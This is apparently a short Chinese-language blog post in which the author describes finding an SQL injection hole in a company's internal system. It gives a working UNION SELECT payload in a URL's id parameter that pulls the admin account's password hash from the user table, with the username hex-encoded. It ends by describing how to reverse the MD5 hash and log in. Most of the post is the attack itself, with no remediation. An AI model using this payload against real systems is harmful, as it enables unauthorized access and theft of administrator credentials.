刚刚发现公司程序代码有SQL注入 and 1=1 注入漏洞,由于是内部系统所以省去很多麻烦我这边就不需要去爆具体查表结构了,直接上侵入的地址参数。

?id=1598%20union%20select%201,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22%20from%20user%20where%20username=0x61646d696e%20limit%201,1

这里 username=admin ,然后通过16进制以后变成: 61646d696e ,前面需要加 0x 变成16进制。

红色涂改部分为:admin的密码。然后通过MD5值反向解密,或者admin用户的密码。登录成功!

评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注